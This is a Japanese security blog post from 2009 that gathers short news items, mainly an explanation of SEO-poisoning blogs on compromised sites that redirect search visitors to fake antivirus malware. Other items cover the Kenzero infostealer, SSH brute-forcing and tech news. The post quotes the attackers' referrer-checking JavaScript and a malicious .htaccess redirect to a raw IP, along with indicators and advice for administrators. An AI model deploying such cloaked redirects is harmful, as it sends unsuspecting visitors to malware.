UnderForge of Lack

税関記念日 (1872年、運上所の呼称を「税関」に統一)
太平洋記念日 (フェルディナンド・マゼランが、マゼラン海峡を通過)

----------
Black Hat SEO poisoning

SEOという言葉を知らないWEB屋さんはあまりいないと思いますが、SEO汚染の話はどうなんでしょう？
先日紹介した、正規blogが大規模なSEOスパムを発生させ、FakeAVへの誘導を行っているという記事 Google Search Results Significantly Poisoned の続報です。

Rogue blogs redirect search traffic to bogus AV sites. Part 1.
Rogue blogs redirect search traffic to bogus AV sites. Part 2.
このblogを使ったSEO汚染攻撃は、以下のようなスキームで成功しています。

1. 攻撃者は正規サイトのサブディレクトリにblogエントリを作成する
2. blogは各postが、Googleによる投稿タイトルでのSERP(検索結果）に、それぞれ5つの画像イメージの結果を返すように構成されている
3. 各blogのタイトルは、微妙にポピュラーではないキーワード（たとえば “blue mustang picture“, “upstate ny photos“, “pictures of 2008 cadillac“, “cinderella story pictures“, “fan remote wiring diagram“... など）を使用している。
4. これらのBlogポストそのものを直接見ても無害だが、Google上の検索結果をクリックすると、FakeAVのサイトにリダイレクトされる（それらは実際にはトロイの木馬だ）
5. すべてのblogは全く同じ構造をしており、Googleをターゲットにしてからずっと、容易に「検索」によって探し当てることが可能。たとえば、"allinurl:albums/bsblog/category" というキーワードでは 295,000ものヒットがある。

そして以下のようなスクリプトによって、検索エンジンを経由してきた（リファラーチェック）時だけ別の場所にリダイレクトされます。
if ( document.referrer && document.referrer != '' && (document.referrer.match(/msn/i) ||
document.referrer.match(/live/i) || document.referrer.match(/altavista/i) ||
document.referrer.match(/baidu/i) || document.referrer.match(/yahoo/i) ||
( document.referrer.match(/google/i) && (document.referrer.match(/imgres/i) ||
document.referrer.match(/search/i) || document.referrer.match(/blogsearch/i) ) ) )) {
if (top.location.replace) {
top.location.replace(url);
}
else {
top.location.href = (url);
}
こうして、GoogleBotにはMalware判断されない、リダイレクタが誕生しています。

もし、自分のサイトがこのようなリダイレクタの踏み台になっている場合、 .htaccess に以下のような記述があるかもしれません。
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.90/in.html?s=ipw2 [R,L]

対策は何度も言うように FTP を使用しないことにあります。
どうしてもFTPを許可しなければならない場合、TCPラッパによるアクセス制限を含めた管理アクセスが重要になるでしょう。
また、SFTP/SCPアプリケーションにパスワードを保存しないでください。

感染しているかも？と不安なサイト管理者は、全サーバ内のファイルから以下のキーワードをGREPし、オリジナルファイルにその記述が存在するかどうか確認してみるのが良いでしょう。
mdblog
bmblog
bmsblogs
bsblog
blog (このキーワードはあってもおかしくなさそうですが・・・)

----------
P3P
Illegal games? Pay the price - publicly!
Setup.exeが実行されると、特定のサイトから画像ファイル(.bmp)のダウンロードを試みます。この画像をベースに、ユーザの個人情報（フルネーム、ゲーム用のパスワード、電子メールアドレス、郵便番号、住所、性別、会社名、電話番号）を入力するように強要されます。このゲームをプレイしたいと必死な(desperately)人は、こうした（個人情報の入力）行為をオンライン上で行うことがどれほど危険、そして何度でも要求されるであろうことに思い至らず、急いで入力してしまうかもしれません。そして、その情報とともに自分のデスクトップの画面が、Web上にさらされていることに気がつくことになるでしょう。
これは恥ずかしい・・（苦笑）
Infostealer.Kenzero

Puppet様のとこで記事にされてたコレのことなのかな？
あれこれ
shareで落とした割れエロゲのsetup.exe踏んで個人情報が流出される:【2ch】ニュー速VIPブログ(`･ω･´)
↑のポスト内
ウイルスバスターがSetup.exeに反応
遅いよ・・・（笑）

MD5:0x7D69A51FD4E2C7E62B5F7AAADDD50B56
112.78.219.142 as users96.heteml.jp (現在は当該ドメイン停止中）

hetemlも災難だなぁ・・（せっかくロリポと域帯分割してるのに）
user96サーバの人は、移転を願い出たほうがいいかもですね。

----------
Norton？

Windowsロゴが出た後、真っ黒の画面にマウスカーソルだけ。はNortonが入っていても…。

「Gumblarウイルス」にも多層防御は有効、シマンテックが解説 -- 2009.05.26

安全神話なんか、紙よりも軽いものです・・

----------
SSH辞書攻撃Password
Do and don’ts for p@$$w0rd$
Trivia: One attacker tried more than 400,000 user name and password combinations.
そんなIPは塞いでしまいなさい！

l33tモードが強いのはもっともですが、日本人的には
Password = 8suwa-do とかにすると、まず英語圏のアタッカーにはわからないのでは？とか思っています（笑）
※あくまで例ですので、この文字列で攻撃しないでね

andrew/andrew って多いのかな？
WARDNA!?

----------
短縮URL対策
ブラック・フライデイ 2009

LongURL
TinyURLの逆ですね（笑）
FirefoxのAdd-on (LongURL Mobile Expander 2.0.0 )もあるようですので、Twitter愛好者の方は検討してみてください。

----------
Virus作成で就職活動
「初のiPhoneワーム」作者、アプリメーカーに就職へ

でじゃぶ：
Twitterに新たなワームの亜種出現、作者は17歳の少年？ -- 2009.04.20
ワームの亜種の出現と同じタイミングで、exqSoft Solutionsという会社がこの少年をWebアプリケーション開発者として採用したというニュースが報じられた。

----------
WebBrowser pierce Local Access
JavaScriptからローカルファイルシステムへのアクセスを可能にするFile API、標準化へ一
File APIを利用することで、たとえばローカルのテキストファイルを読み込んでテキストエリアにその内容を入力する、といった処理がクライアントサイドだけで実装できるようになる。また、セキュリティ的な問題を発生させないよう、フォームの＜input type="file"＞要素でユーザーが指定したファイルのみにアクセスできるような制限が課せられているとのこと。
File API
Firefox 3.6β4公開　ローカルファイル処理が可能に

セキュリティ的な懸念を払拭するために色々協議し、実装しても、その穴を突くものが現れるのがこの世界なので・・かといって、新技術を否定し続けるわけにも行かず・・・
利便と安全の天秤は今後も振れ続けるのでしょうか？

----------
らんちょんみ～と

NetGamerはMalwareの夢を見るか？
Spammer believes WOW users are sad lonely men.
そして、WOWのパスワードを盗まれます・笑

トワイライトの第２弾、NewMoonの映画公開が迫る中、プレビューを謳う詐欺サイトが増えている・・とか？
注意：WOTカード真っ赤なので注意してください↓
http://blogs.paretologic.com/malwarediaries/index.php/2009/11/27/new-moon/

----------
スパコン
長崎大学のスーパーコンピュータがIEEEの「ゴードン・ベル賞」（価格性能部門）を受賞
スパコン開発で「ゴードン・ベル賞」　長崎大助教ら受賞　「国内最速」安価で実現
3800万円！

一方、米陸軍は？
Sony still subsidizing US military supercomputer efforts
The US military has announced plans to buy 2,200 more of the game consoles, so that they can massively beef up the processing power of an existing, PS3-based supercomputer.

----------
Windows 8
『Windows 8』、2012年には登場か？
Windows 8、リリースは2012年予定
最近あんまりLinux陣営の動きが無いですよね・・

----------
Google
新聞に拒否されてもGoogleは痛くも痒くもない–という驚異の調査結果
そういえば、最近GoogleがTV-CMやってますね
さがそう。検索ワードでつくる30秒の｢検索ストーリー｣

----------
Wikipedia
Wikipediaの編集者、大幅に減少中
ふ～んとか思ってたけど
Wikipedia’s Volunteer Story
Wikimedia財団、Wikipediaの投稿者数減少に関する報道についてコメント
Wikipedia運営団体、「ボランティア編集者激減」の報道に反論

/.のコメントにもあるように、一部の恣意的な記事や、何度も間違いが書き戻される「サルカニ合戦」状態は見苦しいですよね[要出展]（笑）

----------
| 1259370066 | B | [goog-black-hash 1.45382 update]
| 1259370014 | M | [goog-malware-hash 1.17505 update]
| 367280 | -3764(371044)
| 1054892 |
EoF

This entry was posted on 土曜日, 11 月 28th, 2009 at 10:32 AM and is filed under security. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.